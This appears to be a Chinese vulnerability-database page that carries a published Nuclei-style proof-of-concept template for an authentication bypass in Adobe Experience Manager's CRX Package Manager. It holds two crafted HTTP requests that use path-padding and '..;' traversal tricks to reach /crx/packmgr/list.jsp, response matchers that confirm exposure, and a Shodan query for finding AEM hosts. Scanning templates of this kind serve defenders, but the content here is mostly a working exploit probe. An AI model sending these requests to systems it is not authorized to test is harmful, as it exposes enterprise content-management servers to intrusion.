漏洞描述
Adobe Experience Manager Package Manager is susceptible to a hard to exploit authentication bypass issue. This issue only potentially impacts AEM on-premise or AEM as a Managed Service if default security configurations are removed.
aem-crx-bypass: AEM Package Manager - Authentication Bypass
PoC代码[已公开]
id: aem-crx-bypass
info:
name: AEM Package Manager - Authentication Bypass
author: dhiyaneshDK
severity: critical
description: Adobe Experience Manager Package Manager is susceptible to a hard to exploit authentication bypass issue. This issue only potentially impacts AEM on-premise or AEM as a Managed Service if default security configurations are removed.
remediation: "Adobe recommends AEM customers review access controls for the CRX package manager path: /etc/packages."
reference:
- https://labs.detectify.com/2021/06/28/aem-crx-bypass-0day-control-over-some-enterprise-aem-crx-package-manager/
classification:
cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: adobe
product: experience_manager
shodan-query: http.component:"Adobe Experience Manager"
tags: aem,adobe,misconfig,vuln
http:
- raw:
- |
GET /crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1
Host: {{Hostname}}
Referer: {{BaseURL}}
Accept-Encoding: gzip, deflate
- |
GET /content/..;/crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1
Host: {{Hostname}}
Referer: {{BaseURL}}
Accept-Encoding: gzip, deflate
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'buildCount'
- 'downloadName'
- 'acHandling'
condition: and
- type: word
part: header
words:
- 'application/json'
- type: status
status:
- 200
# digest: 4b0a00483046022100b58981cb573aa1e89d54d7fbc0e605271711f4eff65cef465aee34a3231440be0221008aa78cc7a8f4ed58a94d1612527533733590f27df31b8f713c240d0f5992df3a:922c64590222798bb761d5b6d8e72950